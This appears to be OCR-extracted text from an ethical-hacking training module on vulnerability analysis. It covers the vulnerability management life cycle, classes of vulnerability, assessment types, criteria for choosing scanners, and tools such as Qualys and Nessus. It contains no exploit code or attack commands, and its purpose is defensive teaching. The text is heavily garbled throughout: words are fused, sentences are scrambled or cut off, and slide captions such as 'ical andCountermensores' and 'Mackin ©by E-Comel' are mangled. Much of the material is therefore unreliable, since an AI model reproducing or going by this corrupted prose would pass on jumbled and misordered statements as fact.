and prevention efforts.It also has an advancedsearchtechnique whereattackerscan search
and view weaknesses basedon researchconcepts, development concepts, and architectural
concepts.
SearchCWE
by ArhnctrlConcets
Figure5.4:Screenshot CWEresultsfr
showing SMBquery
ical andCountermensores
Mackin ©by E-Comel
Copyright
Life Cycle
Vulnerability-Management
‘Baseline
‘Vulnerability
Scan
ey,
Risk
Astessment
ey mR a
|
Verification Remediation
=
Life Cycle
‘Vulnerability-Management
The vulnerability management life cycleis an importantprocessthat helpsidentify and
remediatesecurity weaknesses before theycan be exploited. Thisincludesdefining the risk
posture
and policiesforan organization,
a
creatingcomplete assetlist of systems,
the environment for vulnerabilitiesandexposures,andtaking
assessing
vulnerabilitiesthat are identified.The implementation of a vulnerability
scanningand
management
the
action to mitigate
lifecycle
helpsgaina strategic perspective regardingpossiblecybersecurity
threatsandrendersinsecure
computing environments more resilientto attacks.
Vulnerability
management shouldbe implemented as it evaluatesand
i n every organization
controlsthe risksand vulnerabilitiesi n the system. The management process continuously
examines the ITenvironments forvulnerabilitiesandrisksassociated
with the system,
Organizationsshouldmaintain a proper vulnerability
managementprogram to ensure overall
informationsecurity.Vulnerability management the best results when it is
provides
implementedi n a sequenceof well-organized
phases.
Thephases
involvedin vulnerability
management
are:
=
Identify
AssetsandCreatea Baseline
Thisphase
identifies
criticalassetsandprioritizes
them to definethe riskbasedon the
criticality
and value of each system.This creates a goodbaselinefor vulnerability
management. This phase involvesthe gathering
of information
aboutthe identified
to understand
systems the approved ports,software,
drivers,
andbasicconfiguration
of
eachsystem
to
in order develop andmaintain a systembaseline.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
Scan
Thisphase is verycruciali n vulnerability management. analyst
In this step,the security
performsthe vulnerability scan on the network to identify
the knownvulnerabilitiesi n
the organization’s
infrastructure.Vulnerability scans can also be performed on
applicable
compliance templates to assess the organization's
Infrastructureweaknesses
the respective
against compliance guidelines.
RiskAssessment
In this phase,
all serious uncertainties that are associated
with the systemare assessed
andremediationis planned
andprioritized, to permanently eliminatesystem flaws.The
risk assessmentsummarizes the vulnerability
and risklevel identifiedfor eachof the
selectedassets.It determineswhetherthe risk levelfor a particular asset is high,
moderate, or low. Remediationis planned basedon the determinedrisk level. For
example, rankedhigh-risk
vulnerabilities are targetedfirstto decreasethe chancesof
exploitationthat wouldadversely
impactthe organization.
Remediation
Remediationis the processof applyingfixeso n vulnerablesystems i n orderto reduce
the impactand severityof vulnerabilities.This phaseis initiated after the successful
implementation
Verification
of
the baselineandassessmentsteps.
Organizationsneedto performedregular
monitoringto maintain system security.They
use tools such as IDS/IPS
and firewalls.Continuousmonitoring identifies potential
threatsandany new vulnerabilities
that haveevolved. all
bestpractices,
As persecurity
phasesof vulnerability
management must be performed
regularly.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Pre-Assessment
Phase
Identity
Assatsand
Greate@
Chet an ivr eet ee
orien
te tes
Baseline
Pre-Assessment
Phase
Identify
AssetsandCreatea Baseline
The pre-assessment phaseis a preparatory phase, which involvesdefiningpoliciesand
standards,
procedures,of
clarifying
the scope the assessment,
and identifying
designing appropriate information
protection
critical assets to create a goodbaselinefor
and prioritizing
vulnerability
The
management,
following are the stepsinvolved a baseline:
i n creating
1. Identify
andunderstandbusiness
processes
2. Identify
the applications,
data,
andservices that support
the business
processesand
performcodereviews
Identify software,
the approved drivers,
andbasicconfiguration
of eachsystem
Createan inventoryof all assets,
andprioritize
or rankthe criticalassets
Understandpolicyimplementation standardcompliance
and practice with business
processes
Definethe scopeof the assessment
Createinformation to supporteffectiveplanning,
protectionprocedures scheduling,
coordination,
andlogistics
ical andCountermensores
Mackin ©by E-Comel
Copyright
Classify assetsaccording
the identified to thebusiness
needs.
Classification to identify
helps the
highbusinessrisksi n an organization.Prioritize the rated assetsbasedon the impactof their
failureand
their
Prioritizationhelps:
inthe
reliability business.
‘=
decide
Evaluateand
Examine
therisk
a
for
solution
level
tolerance
the consequenceof the
assets
failing
Organize
methods
for the
prioritizing assets
ical andCountermensores
Mackin ©by E-Comel
Copyright
AssessmentPhase
Vulnerability
‘amine
thesecurty
andevaluate phys
dent nd protiewneabites
‘Vulnerability
AssessmentPhase
The vulnerabilityassessmentphase refersto identifyingvulnerabilitiesi n the organization's
infrastructure,includingthe operating system,web applications, and web server. It helps
identify the category of the vulnerability
and criticality in an organization and minimizes the
level of risk.The ultimate goal of vulnerabilityscanningis to scan, examine, evaluate, and
reportthevulnerabilitiesin the organization's
informationsystem.
Theassessmentphaseinvolvesexamining thearchitectureof the network,
evaluating
threatsto
the environment,performing
penetration testing,examiningand evaluatingphysical
security,
analyzingphysical operational
assets,assessing observing
security, policies
andprocedures,
and
interdependencies.
the infrastructure’s
assessing
involvedin the assessmentphase:
‘Steps
Examineandevaluatethe physical security
Checkfor misconfigurationsandhumanerrors
Runvulnerability
scans usingtools
or compliance
Selectthe typeof scan basedon the organization requirements
Identify
andprioritize
vulnerabilities
Identify
falsepositives
andfalsenegatives
Apply
thebusinessand technology
contextto scanner results
PerformOSINTinformationgathering
to validatethevulnerabilities
Createa vulnerability
scanreport
ical andCountermensores
Mackin ©by E-Comel
Copyright
PostAssessmentPhase
‘Risk
Assesement
PostAssessmentPhase
phase,
Thepost-assessment phase,
alsoknownas the recommendation is performed
afterand
basedo n risk assessment.Riskcharacterization
is categorized
bykeycriteria, which helps
the list ofrecommendations.
prioritize
Thetasksperformed phase
in the post-assessment include:
a priority listfor assessment
Creating recommendations analysis
basedon the impact
Developing an action plan to implementtheproposed
remediation
Capturinglessons learnedto improvethe complete
processi n the future
for
Conductingtraining employees
Postassessmentincludesriskassessment, remediation,
verification,
andmonitoring,
Risk Assessment
In theriskassessmentphase,
risksare identified,characterized, along
andclassified with
the techniquesusedto controlor reducetheir impact.It is an importantsteptoward
the
identifyingsecurity
Thetasksperformed
weaknesses i n the IT architecture
include:
in the riskassessmentphase
of an organization
basedon riskranking
Performriskcategorization (forexample,
critical,
high,
medium, andlow)
thelevelof impact
‘Assess
Determinethe threatandrisklevels
ical andCountermensores
Mackin ©by E-Comel
Copyright
Remediation
Remediation refersto the stepstaken to mitigatethe identifiedvulnerabilities.These
includestepslike evaluating vulnerabilities,locating and designing
risks, responses for
measurable,
vulnerabilities,It is importantfor the remediationprocessto be specific,
relevant,
attainable, andtime-bound.
Thetasksperformed in the remediationphaseinclude
Prioritizeremediationbasedo n theriskranking
>
Performing
dynamic analysis
© Reviewing
Monitoring
the
attack
surface
Thisphase
performs using toolssuchas IDS/IPS,
incidentmonitoring SIEM,
andfirewall.
Itimplements
continuous security to thwartever-evolving
monitoring threats.
Thetasksperformed phase
in the monitoring include:
©.
©.
Periodic
scan
Timely and
vulnerability
remediation
identifiedof
assessment
vulnerabilities
© Monitoring logs
intrusion detectionandintrusion prevention
© Implementing
policies,
procedures,andcontrols,
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
aseerment
Typee
Classification
‘Vulnerability and
Assessment
Reports
‘Vulnerability
ical andCountermensores
Mackin ©by E-Comel
Copyright
Classification
Vulnerability
oe
Miscontgurtion
oe
Default
installations utter Overtows
as
= 32
o
Servers
Unpatehed
ie]
Flaws
Design
fo
operating
&
Stem
oe Flaws
Application
o
OpenServices
oe
Default
Pasowords
a [ea]
is]
Classification
Vulnerability
Vulnerabilitiespresent into the following
or networkare classified
i n a system categories:
=
Misconfiguration
Misconfiguration
is the most common vulnerability causedbyhuman
andis mainly
It mayhappen
error,whichallowsattackersto gainunauthorizedaccessto the system.
or unintentionally
intentionally and affects web servers, application platforms,
databases,andnetworks.
Thefollowing
are some examples
of misconfiguration
0 running
An application
with
debug
enabled
portsthatare open foran application
administrative
Unnecessary
outdated
Running softwareo n the system
misconfigured
Using SSLcertificates
or defaultcertificates
authenticated
Improperly externalsystems
Incorrectfolderpermissions
Defaultaccountsor passwords
Setup or configuration
pagesenabled
Disabling andfeatures
settings
security
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackerscan easilydetect these misconfigurations
usingscanningtoolsand then
exploitthe backendsystems. Therefore,
the administratorsmust change
the default
configuration
ofdevicesandoptimizedevice
security.
DefaultInstallations
Defaultinstallationsa re usually
user-friendlyespecially
—
whenthedeviceis being used
bufferoverflowoccurs.
Unpatched
Servers
Serversa re an essentialcomponent of the infrastructureof any organization. Thereare
severalc ases whereorganizations run unpatched and misconfigured servers that
compromise the security and integrity of the data in their system.Hackerslook out for
an them.
thesevulnerabilitiesi n the servers and exploit As theseunpatched servers are a
for
hub the attackers,
softwareregularly
theyserve
as
and maintaining
entrypointinto the network.Thiscan leadto the
exposureof privatedata,financialoss,and discontinuationof operations.
systems properly bypatching
Updating
and fixingbugs c an
thevulnerabilitiescausedbyunpatched
helpi n mitigating servers.
Design
Flaws
Vulnerabilitiesdue to design flawsare universal
to all operating devicesand systems.
Designvulnerabilitiessuchas incorrect encryption
or the poor validationof datareferto
flawsin the functionality
logical exploitto bypass
of the systemthat attackers the
detectionmechanismandacquire access to a secure system.
Operating F
System laws
Dueto vulnerabilities
i n the operatingsystems,applications
suchas trojans,
worms, and
posethreats.Theseattacksuse maliciouscode,
viruses script,or unwantedsoftware,
whichresultsin the lossof sensitive informationandcontrolof computer operations.
Timelypatching of the OS,installing minimal software applications,
and using
ical andCountermensores
Mackin ©by E-Comel
Copyright
applications
withfirewallcapabilities
are essential
stepsthat an administrator
must take
to protectthe OSfromattacks.
Application
Flaws
Application
flawsare vulnerabilities that are exploited
i n applications bythe attackers.
Applications shouldbe securedusing the validationand authorizationof the user.
Flawedapplications pose security threatssuchas datatampering andunauthorized
access to configuration stores. If the applicationsare not secured,
sensitive information
maybe lostor corrupted. Hence, developers mustunderstand theanatomy of common
security vulnerabilitiesanddevelop highlys ecure applications
byproviding properuser
validationandauthorization.
Open
Services
Open
portsandservices mayleadto the lossof dataor DoSattacksandallowattackers
to perform
further attacks on other connecteddevices.Administrators must
checkforunnecessary
continuously or insecure portsand services to reducethe riskto
the network
DefaultPasswords
Manufacturers provide users with defaultpasswords to access the deviceduring its
whichusers must change
initial set-up, for future use. Whenusers forget to update the
passwords andcontinue usingthedefaultpasswords, theymakedevicesandsystems
vulnerableto various attacks,suchas brute force and dictionary attacks.Attackers
exploitthis vulnerabilityto obtain accessto the system. Passwords shouldbe kept
easily a
confidential;failing
compromised
to protectthe confidentiality
of password allowsthe system to be
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Vulnerability
Types Assessment
‘etive
Assessment PassiveAssessment
‘pplication
Assessment Database
A ssessment
ny outted
msconguraton omen or own ‘ORACLE,
POSTEAESL
ce
for Ne reser
Types
of Vulnerability
Assessment (Cont'd)
WirelessNetworkAssessment DistributedAssessment
wireless
networks lent
andserver
appropriate techniques
syncronization
simultaneously
applations, hough
CredontiatodAssossment Non-Crodentialed
A ssessment
‘Manual
Aesossment [Automated
Assossment
In ths
ulnrabilty
typeof assessment,theethical
Score, et
hacker
manually In thistypeof assessment,
‘Quays,
GF LanGuaed
the ethical
hecker
employs
‘Types
of Vulnerability
Assessment
Givenbeloware thedifferent
typesofvulnerability
assessments:
Active Assessment
A typeof vulnerabilityassessmentthat uses network scanners to identifythe hosts,
in a network.Activenetworkscanners can reduce
services, andvulnerabilitiespresent
the intrusiveness of thecheckstheyperform,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Passive
Assessment
Passiveassessmentssniff the traffic presento n the network to identify the active
systems,network services, applications,
and vulnerabilities.Passive assessmentsalso
provide
alist
of
the are
ExternalAssessment
currently
accessing
users who the network.
ical andCountermensores
Mackin ©by E-Comel
Copyright
the physical
Evaluate security
Identify
andreview the remote management andevents
process
the file-sharing
‘Assess mechanisms NFSandSMB/CIFS
(forexample, shares)
© Examinethe antivirus implementation
andevents
Host-based
Assessment
Host-based
assessmentsare a type of securitycheckthat involve conducting
a
configuration-level
check to identifysystemconfigurations,
user directories,file
to evaluate the possibility
systems,registrysettings,and other parameters of
compromise. Theseassessmentscheckthe security of a particular
network or server.
Host-based s canners assess systemsto identify vulnerabilities
such as native
configurationtables, or file permissions,andsoftwareconfiguration
incorrect registry
errors, Host-basedassessmentsu se manycommercial andopen-source scanningtools.
Network-based
Assessment
Networkassessmentsdeterminethe possible networksecurity attacksthat may occur
on an organization's system. Theseassessments discovernetwork resources and map
the portsand services running to various areas on the network.It evaluatesthe
organization's system for vulnerabilitiessuchas missingpatches, unnecessary services,
weak authentication, and weak encryption. Network assessmentprofessionals use
firewallsand network scanners, suchas Nessus.Thesescanners identify open ports,
recognize the services runningon thoseports,anddetectvulnerabilities associated with
theseservices. Theseassessmentshelp identify
organizations pointsof entry andattack
into a network since theyfollowthe pathand approach of the hacker.Theyhelp
organizations determinehow systems are vulnerableto Internet and intranet attacks,
andhow an attackercan gain access to importantinformation. A typical network
assessmentconducts the followingtests on a network:
©.
Checks
topologies
router
filtering
Examines
the
inappropriate configuration
thenetwork for
rules
firewall
Identifies
inappropriately
configured
databaseservers
Testsindividualservices andprotocols SNMP,
suchas HTTP, andFTP
ReviewsHTML source codefor unnecessaryinformation
0 Performsbounds
Application
Assessment
checkingon variables
{Anapplication
assessmentfocuses Webapplications,
o n transactional traditionalclient-
server applications,
and hybridsystems. all elementsof an application
It analyzes
infrastructure,
including deployment and communication within the clientand server.
Thistypeof assessmentt ests the webserverinfrastructurefor any misconfiguration,
outdatedcontent,or knownvulnerabilities. professionals
Security use bothcommercial
andopen-source toolsto performsuchassessments.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Database
Assessment
‘A
databaseassessmenti s any assessmentfocusedon testingthe databasesfor the
presence of any misconfiguration Theseassessmentsmainly
or knownvulnerabilities.
concentrate on
POSTGRESQL
professionals
testing
various databasetechnologies
to identify
like MYSQL,MSSQL, ORACLE,and
data exposure or injectiontypevulnerabilities.Security
use bothcommercial andopen-sourcetoolsto performsuchassessments.
WirelessNetworkAssessment
Wirelessnetwork assessment determinesthe vulnerabilitiesi n an organization's
wirelessnetworks.In the past,wirelessnetworksusedweak anddefectivedata
encryption mechanisms. Now,wirelessnetworkstandardshave evolved, but many
networksstill use weakand outdatedsecurity mechanismsand are open to attack
Wirelessnetwork assessmentstry to attackwirelessauthenticationmechanisms and
gainunauthorized access.Thistypeof assessmenttestswireless networks andidentifies
rogue networksthat may exist within an organization'sperimeter.Theseassessments
auditclient-specified
sites with a wirelessnetwork. Theysniffwirelessnetworktraffic
and tryto crackencryption keys. Auditorstest othernetworkaccessif theygainaccess
towireless
network.
the
Distributed
Assessment
employed
Thistypeof assessment, byorganizations
that possess
assetslike servers and
clients at different locations, involves simultaneously assessingthe distributed
organization assets, such as client and server applications, using appropriate
synchronization techniques. Synchronization playsa critical role i n this type of
assessment.Bysynchronizing all theseparate
the test runs together, assetssituatedat
multiplelocationsc an betestedat the same time.
CredentialedAssessment
Credentialed assessmentis also calledauthenticated assessment.In this type of
assessment,the ethicalhackerpossessesthe credentialsof all machines
presenti n the
assessed
network.The chances of findingvulnerabilities
relatedto operating
systems
andapplications are higher i n credentialassessmentthan i n non-credential assessment.
Thistypeof assessmentis challenging since it is highly unclearwho owns particular
assets in largeenterprises, and even when the ethical hackeridentifiesthe actual
‘ownersof the assets, accessing the credentialsof theseassetsis highly trickysince the
asset owners generally do not sharesuchconfidentialinformation.Also,even if the
ethicalhackersuccessfully acquiresall required credentials, maintaining the password
list is a huge task since there can be issueswith things like changed passwords,typing
errors, andadministrativeprivileges. Although it is the bestway of assessing a target
enterprise networkforvulnerabilitiesand is highly reliable, it is a complexassessment
thatis challenging.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Non-Credentialed
Assessment
Non-credentialed alsocalledunauthenticated
assessment, provides
assessment, a quick
‘overviewof weaknessesbyanalyzingthe networkservices that are exposed bythe host.
Since it is a non-credentialassessment, an ethical hackerdoes not require any
credentialsfor the assets to perform their assessments.This typeof assessment
generates a brief reportregardingvulnerabilities;
however, it is not reliablebecause it
doesnot provide deeper insight
into the OSandapplication vulnerabilitiesthat are not
exposed bythehostto the network,Thisassessmenti s alsoincapable of detectingthe
vulnerabilitiesthat are potentially
coveredbyfirewalls.It is prone to false-positive
outputsandis not reliably a s compared
effective to credential-based
assessment.
‘Manual
Assessment
After performing
footprinting
andnetworkscanningandobtaining crucialinformation,if
the ethicalhackerperforms manualresearch for exploring the vulnerabilities
or
weaknesses,theymanually rank the vulnerabilitiesand score them byreferring to
vulnerability
scoringstandards
likeCVSSandvulnerability databases likeCVEand CWE.
is
Suchassessmentconsidered
AutomatedAssessment
to bemanual.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
aseetment
Typee
Classification
‘Vulnerability and
Assessment
Reports
‘Vulnerability
AssessmentSolutionsand Tools
Vulnerability
Vulnerability toolsforinformation
assessmentsolutionsare important security
management
as
theyidentify
all potential weaknesses
security beforea n attackercan exploit
them.Thereare
approaches
different to perform
andsolutionsavailable a vulnerability
assessment.Selecting
an
assessment approach
appropriate playsa major role i n mitigatingthe threats that an
organization
faces.
This section outlinesthe various solutions,and tools used to perform
approaches, a
vulnerability
assessment,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Comparing
Approaches Assessment
to Vulnerability
organizations
interna frm
© Instatedinthe
network
Otero bythie parties,
(©
secur consulting
such a s audting
oF
are
(©insted i n private
or nonroutable
others
the Inernet addressable
space
portionofan
or |@Somesolutions hostedinsidethe
‘network,
network
whe are hostedoutside
the
(©installedintheprivate
network
or in other drawback ofthissolutionsthat attackers
‘detect
outside
attacks an aut thenetwork fromoutside
e@
|
‘Comparing
Approaches Assessment(Cont'd)
to Vulnerability iq
‘Tree-Based
versus Inference-BasedAssessment
‘Tree-Based
Assessment Inference-BasedAssessment
selects
diferent Scanning
‘The
ator
stars
by
building
inventory foreach
strategies |@
pratocel
foundonthemachine
an of
sect
Forexample,
services,
3
the administrator
andusesserver
another scanner for
scanner
for
Ununservers
toring
an emallserver
protocol
thescanningprocess
o database
webserver,
without
any machine
Startingshotof neligence,
Continuous
andthen scanning
information
incorporating
‘ulnerabilties
on each
onlytherelevanttests
‘execute
andtars to
&
Comparing Approaches to Vulnerability
Assessment
Thereare fourtypesof vulnerability
assessmentsolutions:product-based
solutions,
service-
basedsolutions,
tree-basedassessment,
andinference-based
assessment.
Product-Based
Solutions
Product-based solutionsare installedi n the organization's
internalnetwork.Theya re
installedeither on a privateor non-routablespace or i n the Internet-addressable
ical andCountermensores
Mackin ©by E-Comel
Copyright
portionof an organization's
network,If theyare installed
o n a privatenetwork(behind
the firewall),
theycannot always
detectoutsideattacks.
Service-Based
Solutions
solutionsare offeredby third parties, such as auditing
Service-based or security
consulting
firms.Somesolutionsare hostedinsidethe network,
whileothersare hosted
outsidethe network.A drawback
ofthissolutionis thatattackerscan auditthe network
fromtheoutside.
Tree-Based
Assessment
Ina tree-basedassessment,
component
the auditorselectsdifferent
of the informationsystem.
for servers runningWindows,
Forexample,
databases,
for
each
strategies machineor
theadministratorselectsa scanner
andweb services but uses a different scanner
for Linuxservers. Thisapproach
relieson theadministratorto provide a startingpieceof
intelligence, and then to start scanningcontinuously without incorporating any
Inference-Based
at of
informationfound the time scanning,
Assessment
In an inference-based scanning starts bybuilding
assessment, of the
an inventory
protocols
foundon themachine.Afterfinding thescanningprocessstarts to
a protocol,
detectwhichportsare attachedto services, suchas an emailserver, web server, or
server. Afterfinding
database services, it selects
vulnerabilities
on eachmachine
and
startsto execute onlythoserelevantt ests.
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
Characteristics
of a Good AssessmentSolution
Vulnerability (CEH
©terre
caret
ering
netweri
oso te netwetreeres por pote
e Automatica againstcontinuously
cane updateddatabases
©
iS)
crores tr reports,incing valerie,
storable and customizable svete
by andend ana
e Suggests remedies
appropriate andworkarounds
tocorrect vlnerabites
© rvs ouside
ew acters
Organizations
a
Characteristicsof GoodVulnerability
AssessmentSolution
needto selecta proper andsuitablevulnerability
assessmentsolutionto detect,
their criticalIT assetsfromvarious
assess,andprotect internalandexternalthreats.
of a good
Thecharacteristics assessmentsolutionare as follows:
vulnerability
=
Ensurescorrect outcomes bytestingthe network, networkresources, ports,protocols,
andoperating systems
Usesa well-organized inference-based
approach fortesting
‘Automatically
scansandchecks continuously
against updated databases
Createsbrief,actionable, reports,including
customizable reportsof vulnerabilitiesby
level,
severity andtrendanalysis
Supports multiplenetworks
Suggestsappropriate remedies andworkarounds to correct vulnerabilities
Imitates theoutsideview
of
attackers to gain its objective
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Vulnerability
Working Solutions
Scanning
a nd
Sarvies
>|
Findings
andRecommendations
of Vulnerability
Working Solutions
Scanning
Anyorganization needsto handleandprocesslarge volumesof datato conductbusiness. These
largevolumesof data contain privileged information of that particularorganization.Attackers
tryto identify and then use theseto gain accessto critical
vulnerabilitiesthat theycan exploit,
datafor illegal purposes.Vulnerability analysisanalyzes and detectsrisk-prone areas i n the
organizational network.This analysis uses various tools and reportson the vulnerabilities
present i n the network
ical andCountermensores
Mackin ©by E-Comel
Copyright
Termof References
> Perform
Serviceand
OSDiscovery
‘Test
Services
OSfor
Known
Vulnerabiliti
Findings andRecommendations
55: Theworking
Figure of vulnerability
|
seamingsolutions
Modul
5 520
Page tical andCountermensores
Making Copyright©
by Comet
of Vulnerability
Types AssessmentTools
‘Types
of Vulnerability
AssessmentTools
Thereare six typesof vulnerability assessmenttools,
vulnerability
assessmenttools:host-based
application-layervulnerabilityassessmenttools,depthassessmenttools,scopeassessment
tools,active andpassivetools,andlocationanddata-examinationtools.
Vulnerability
Host-Based Assessment
Tools
Thehost-based scanning
suchas the Web,critical
toolsare appropriate
files,databases,
for
directories,servers
that run various applications,
andremote accesses.Thesehost-
based scanners can detect highlevels of vulnerabilitiesand provide required
information aboutthe fixes(patches). A host-basedvulnerability assessmenttool
identifiesthe OS running on a particularhost computerand tests it for known
deficiencies.
t alsosearches forcommon applications
andservices.
Depth
Assessment
Tools
Depthassessment tools are used to discoverand identifypreviously
unknown
vulnerabilities
to a
in a system.
system's
interface, Generally,
tools suchasfuzzers,
are usedto identify
whichprovide arbitrary
input
vulnerabilitiesto an unstabledepth.
Many
of thesetoolsuse a set of
toa knownvulnerability vulnerability
signatures
or not.
product to test whethera is resistant
Application-Layer
Vulnerability
AssessmentTools
vulnerability
Application-layer assessmenttools are designed to serve the needsof all
kindsof operating
systemtypesand applications.Variousresources posea varietyof
securitythreatsand are identified bythe tools designedfor that purpose. Observing
systemvulnerabilitiesthrough the Internet using an external router, firewall,
or
webserveris calledan externalvulnerabilityassessment.Thesevulnerabilitiescouldbe
ical andCountermensores
Mackin ©by E-Comel
Copyright
external DoS/DD0Sthreats,network datainterception,or otherissues. The analyst
performs a vulnerability
assessmentand notes vulnerableresources. The network
vulnerability
informationis updated into the tools. Application-layer
regularly
vulnerability
assessmenttoolsare directedtowardswebservers or databases.
Scope AssessmentTools
‘Scopeassessmenttools provide bytestingvulnerabilities
an assessmentofthe security
i n the applications
and operating
system. Thesetools provide
standardcontrolsand a
reporting interface
thatallowstheuser to selecta suitablescan. Thesetoolsgenerate
a
standardreportbasedon the informationfound.Someassessmenttools are designed
to test a specific or application
application typefor vulnerability.
ActiveandPassive
Tools
Activescanners perform vulnerability
checkson the networkfunctionsthat consume
resources on the network.Themain advantage of the active scanner is that the system
administratoror IT managerhasgoodcontrolof the timingand the parameters of
vulnerability scans. Thisscanner cannot be usedfor criticaloperating systems becauseit
usessystem resourcesthat affectthe processing
ofothertasks.
Passive s canners are thosethat do not considerably affect systemresources,as they
onlyobservesystemdataandperform dataprocessing o n a separate analysismachine.
A passivescanner first receives system datathat provide complete informationon the
processes
that and that
data
are running then
LocationandDataExaminationTools
assesses against a set of rules.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Choosing AssessmentTool
a Vulnerability
|
tools
are
Winerabitya ssessment used
t o test a hostor aplication
forvulnerabies
|G Choosethe
tools
that bestsats theflowingrequirements:
asa number
of egulaty vlnerabityserpsothe
updated platforms thatyou are
Choosing AssessmentTool
a Vulnerability
Vendor-designed
vulnerability
assessmenttools can be usedto test a host or application
for
Thereare severalavailablevulnerability
vulnerabilities. toolsthat includeport
assessment
vulnerability
scanners, andOSvulnerability
scanners, assessmentscanners.Organizations
must
toolsbasedon theirtest requirements.
chooseappropriate
thetoolsthat bestsatisfy
Choose thefollowing
requirements:
=
Toolsmust becapable of testinganywhere
fromdozensto 30,000
different
Theselected
onthe
depending product
vulnerabilities,
toolshouldhavea sounddatabase andfrequently
ofvulnerabilities
updated
attack signatures
Picka toolthat matches
the environment andexpertise
Makesureregularly
to update the scan engineto ensure the tool is aware of thelatest,
known
Verify
vulnerabilities
thatthe chosenvulnerability
assessmenttool hasaccurate networkmapping,
application tests. Not alltoolscan findtheprotocols
mapping,andpenetration running,
andanalyze
a network'sperformance.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Check
whetherthe too!hasdifferent
levelsof penetration
to stoplockups
Themaintenancecostsof toolscan beoffsetbyeffectively
usingthem
Ensurethatthe vulnerability
assessmenttool can run quickly
andaccurately
its scans
Ensurethatthe tool can perform scans usingmultiple
protocols
Verify
thatthetoolcan understandandanalyze
thenetworktopology
to perform
the
assessment
Bandwidthlimitationsare a majorconcern whendealing
with large
networks.Ensure
thevulnerability bandwidth
assessmenttool hashigh allocation
Ensurethat the vulnerability excellentquerythrottling
assessmenttool possess features
Ensurethatthe tool can alsoassess fragile andnon-traditionalassets
systems
ical andCountermensores
Mackin ©by E-Comel
Copyright
Criteria for Choosing AssessmentTool
a Vulnerability
Types being
ofvulnerabilities a ssessed
Testing
capabilty
of scanning
‘Ability
to provide
accuratereports
ficient andaccurateseanning
forwritingitsown tests
Funetionality
Testunscheduling
ical andCountermensores
Mackin ©by E-Comel
Copyright
BestPracticesfor Selecting AssessmentTools
Vulnerability
(©Ensurethati t does
n ot damage
yournetwork
or whlerunning
system tools
collected
thefunctionality,
‘Understand
beforebeginning
anddecide
ontheinformation
that
needs to be
‘Decide
thesource location
ofthescan taking
into consideration
the information
hatneeds tobecollected
Enable
loging
everyis
scanned
tie a computer
thei
Users shoulsan fr wuinerabiltes
frequently
systems
ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
(©
A
AssessmentTools: Qualys
cloud
basedservice that
Vulnerability C/EH
Management
j
global
fers immediate
visit in
Internettreat 9
‘dentition
ofthreats
montoring
{and of
unexpectedchangesina
becomebreaches
@auaiys
AssessmentTools:NessusProfessionaland
Vulnerability
GFILanGuard
nascent
oridettying
seluton
05
Module 527
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
AssessmentTools:OpenVAS
Vulnerability and Nikto (CEH
inion ‘Analyeer
(MBSA)
Web
cunts Vlortity eSECUREIA
‘Vulnerability
AssessmentTools
performs
An attacker vulnerability to identify
scanning loopholes
security in the targetnetwork
that theycan exploit analysts
to launchattacks.Security can use vulnerability
assessmenttools
to identify weaknesses presenti n the organization’s
securitypostureand remediatethe
identifiedvulnerabilitiesbeforean attackerexploits
them.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Networkvulnerability scannershelp andidentify
to analyze vulnerabilities
i n the targetnetwork
or networkresources byusing vulnerability
assessmentandnetworkauditing. Thesetoolsalso
assistin overcoming weaknessesin thenetworkbysuggesting
various remediationtechniques.
Thefollowing
Qualys
are most
effective
vulnerability
assessment
some of the
Vulnerability
tools:
Management
Source:https://www.qualys.com
Qualys
VM is a cloud-based global
service thatgivesimmediate, visibility
into whereIT
mightbe vulnerableto the latestInternet threatsandhow to protectthem.It
systems
helps
to continuously
identify
threatsand monitor unexpected
changes
i n a network
beforetheyturn into breaches.
Featurc
© Agent-based
detection
workswith the Qualys
‘Also extending
CloudAgents, its networkcoverageto
unscannable
assets,
Constantmonitoring
andalerts
VM is paired
‘When (CM),
with Continuous Monitoring InfoSecteams are proactively
threats,so problems
alertedabout potential can be tackledbefore theyturn into
breaches.
‘Comprehensive
coverageandvisibility
Continuously scans and identifies vulnerabilities
for protectingIT assets on-
i n the cloud,
premises, and at mobileendpoints.
Its executive dashboarddisplaysan
of
‘overview the securitypostureandgives access to remediationdetails.VM
generates for multiple
role-basedreports
custom, including
stakeholders, automatic
security forcompliance
documentation
auditors.
for
VM
‘As
the perimeter-less
enterprises
world
adoptcloudcomputing, mobility,
andother disruptive
technologies
for digitaltransformation,Qualys VM offers next-generation vulnerability
management for thesehybrid
IT environments whosetraditionalboundarieshave
beenblurred.
forgotten
Discover devicesandorganizethehostassets
Qualys
can helpquickly
determinewhat is running in different partsof the
network—from the perimeterand corporatenetworkto virtualizedmachinesand
cloudservices. It can alsoidentify
unexpected web servers, andother
accesspoints,
devicesthat can exposethe networkto attack.
‘Scan
systems
everywhere,
forvulnerabilities
‘Scan
anywhere fromthe same console,
and
accuratelyefficiently
including
the perimeter,
the internal
network,
andcloudenvironments.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Identify risks
andprioritize
Qualys,usingtrend analysis, and Patchimpactpredictions,
Zero-Day, can identify
business
the highest
Remediate
risks
vulnerabilities
Qualys’s
ability
to trackvulnerability
dataacrosshostsandtime produces
interactive
reportsthat provide a better understanding
of the security
of thenetwork.
56:Vunerablty
Figure s caning sing Qualys
unerabiltyManagement
NessusProfessional
Source:https://www.tenable.com
Nessus Professionalis an assessment solution for identifying vulnerabilities,
configuration networks.It performs
issues,andmalwarethat attackersuse to penetrate
configuration,
vulnerability, and compliance assessment. It supportsvarious
technologies
such as operatingsystems, network devices, hypervisors,databases,
tabletsandphones,
web servers, andcriticalinfrastructure.
Nessusis the vulnerability
scanningplatform
for auditorsand securityanalysts,
Users
can schedulescans across multiplescanners,and use wizardsto easily
and quickly
create policies,
schedulescans,andsendresultsvia email
Features:
© High-speed
assetdiscovery
